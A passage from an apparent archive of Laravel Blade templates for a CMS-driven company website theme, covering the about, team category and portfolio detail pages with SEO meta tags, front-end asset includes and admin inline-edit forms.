}}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/about/index.blade.php����������������������������������������������������������������0000644�����������������00000024434�14765366572�0013554 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.sections.about.about-style1') @include('frontend.sections.history.history-style1') @include('frontend.sections.sponsor.sponsor-style1') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/team/category-index-list.blade.php���������������������������������������������������0000644�����������������00000032345�14765366572�0016154 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('team check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Team Section Start //--> <section class="section" id="team"> <div class="container"> @if(Auth::user()) @can('team check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> <div class="col-md-12"> @if (is_countable($team_count_categories) && count($team_count_categories) > 0) <div class="text-center mb-5 custom-category-link"> <a href="{{ url($team_index->page_uri) }}" class="mb-2">{{ __('frontend.all_teams') }}</a> @foreach ($team_count_categories as $team_count_category) @if (isset($team_count_category->team_category->team_category_slug)) <a class="@if ($category->category_name == $team_count_category->team_category->category_name) current @endif mb-2" href="{{ route('default-team-category-index', $team_count_category->team_category->team_category_slug) }}">{{$team_count_category->team_category->category_name }} ({{ $team_count_category->category_count }})</a> @endif @endforeach @unset ($team_count_category) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="text-center mb-5 custom-category-link"> <a href="#" class="link-dark">Management</a> <a href="#" class="link-secondary">Departments</a> <a href="#" class="link-secondary">Business Development</a> <a href="#" class="link-secondary">Research & Development</a> </div> @endif @endif </div> </div> @if (is_countable($teams_paginate_style) && count($teams_paginate_style) > 0) <div class="row"> @foreach ($teams_paginate_style as $item) <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.{{ $loop->iteration }}s"> <div class="team-card"> @if(Auth::user()) @can('team check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif @if (!empty($item->section_image)) <div class="img"> <img class="custom-max-width-200" src="{{ asset('uploads/img/team/'.$item->section_image) }}" alt="Team image"> </div> @endif <div class="body"> <div class="text"> <h5>{{ $item->name }}</h5> <p>{{ $item->job }}</p> </div> <div class="social"> <ul> @if (!empty($item->facebook_url)) <li><a href="{{ $item->facebook_url }}"><i class="fab fa-facebook-f"></i></a></li> @endif @if (!empty($item->twitter_url)) <li><a href="{{ $item->twitter_url }}"><i class="fab fa-twitter"></i></a></li> @endif @if (!empty($item->instagram_url)) <li><a href="{{ $item->instagram_url }}"><i class="fab fa-instagram"></i></a></li> @endif @if (!empty($item->youtube_url)) <li><a href="{{ $item->youtube_url }}"><i class="fab fa-youtube"></i></a></li> @endif @if (!empty($item->linkedin_url)) <li><a href="{{ $item->linkedin_url }}"><i class="fab fa-linkedin"></i></a></li> @endif </ul> </div> </div> </div> </div> @endforeach @unset ($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $teams_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>George Avenue</h5> <p>Web Designer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.2s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>Dominick A. Gray</h5> <p>App Developer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.3s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>Michael L. Lloyd</h5> <p>UI Designer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> </div> @endif @endif </div> </section> <!--// Team Section End //--> @if(Auth::user()) @can('team check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }}</button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-plus text-white"></i> {{ __('content.add_team') }}</button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/team/category-index.blade.php��������������������������������������������������������0000644�����������������00000024334�14765366572�0015202 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar"> <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.team.category-index-list') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/portfolio/portfolio-detail-show.blade.php��������������������������������������������0000644�����������������00000061055�14765366572�0017603 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!--// Portfolio Single Section Start //--> <section class="section" id="portfolio-single-page"> <div class="container"> <div class="row"> <div class="col-lg-8"> @if(Auth::user()) @can('portfolio check') <div class="easier-mode"> @if(Auth::user()) @can('portfolio check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif @if (is_countable($portfolio_images) && count($portfolio_images) > 0) <div class="owl-carousel owl-theme" id="portfolioCarousel"> @foreach ($portfolio_images as $item) <div class="item"> @if (!empty($item->section_image)) <img src="{{ asset('uploads/img/portfolio/image/'.$item->section_image) }}" alt="portfolio image" class="img-fluid"> @endif </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="owl-carousel owl-theme" id="portfolioCarousel"> <div class="item"> <img src="{{ asset('uploads/img/dummy/800x600.jpg') }}" alt="portfolio image" class="img-fluid"> </div> <div class="item"> <img src="{{ asset('uploads/img/dummy/800x600.jpg') }}" alt="portfolio image" class="img-fluid"> </div> <div class="item"> <img src="{{ asset('uploads/img/dummy/800x600.jpg') }}" alt="portfolio image" class="img-fluid"> </div> </div> @endif @endif @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio-image.create"> <input type="hidden" name="style" value="{{ $portfolio->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.add_portfolio_image') }} </button> </form> </div> </div> @endcan @endif @if(Auth::user()) @can('portfolio check') <div class="easier-mode"> @if(Auth::user()) @can('portfolio check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif @isset ($portfolio_content) <div class="portfolio-single-inner"> <h4>{{ $portfolio->title }}</h4> <div class="author-meta"> <a href="#"><span class="far fa-calendar-alt"></span>{{ Carbon\Carbon::parse($portfolio->created_at)->isoFormat('DD') }} {{ Carbon\Carbon::parse($portfolio->created_at)->isoFormat('MMMM') }} {{ Carbon\Carbon::parse($portfolio->created_at)->isoFormat('GGGG') }}</a> <a href="#"><span class="far fa-bookmark"></span>{{ $portfolio->category_name }}</a> </div> <p>@php echo html_entity_decode($portfolio_content->description); @endphp</p> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="portfolio-single-inner"> <h4>Business Card</h4> <div class="author-meta"> <a href="#"><span class="far fa-user"></span>By Admin</a> <a href="#"><span class="far fa-bookmark"></span>Mockup</a> </div> <p>It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text, and a search for 'lorem ipsum' will uncover many web sites still in their infancy. Various versions have evolved over the years, sometimes by accident, sometimes on purpose (injected humour and the like). </p> <div class="row"> <div class="col-md-6 col-sm-6 portfolio-grid-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> </div> <div class="col-md-6 col-sm-6 portfolio-grid-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> </div> </div> </div> @endif @endisset @if(Auth::user()) @can('portfolio check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio-content.create"> <input type="hidden" name="style" value="{{ $portfolio->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_portfolio_content') }} </button> </form> </div> </div> @endcan @endif </div> <div class="col-lg-4 col-md-12"> <div class="widget-sidebar"> @if(Auth::user()) @can('portfolio check') <div class="easier-mode"> @if(Auth::user()) @can('portfolio check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif <div class="sidebar-widgets"> @isset ($portfolio_detail_section) <h5 class="inner-header-title">{{ $portfolio_detail_section->title }}</h5> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <h5 class="inner-header-title">Portfolio Details</h5> @endif @endisset @if (is_countable($portfolio_details) && count($portfolio_details) > 0) <div class="sidebar-details-list"> <ul> @foreach ($portfolio_details as $item) <li> @if(Auth::user()) @can('portfolio check') <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio-detail.edit"> <input type="hidden" name="style" value=""> <input type="hidden" name="portfolio_id" value="{{ $portfolio->id }}"> <input type="hidden" name="id" value="{{ $item->id }}"> <input type="hidden" name="site_url" 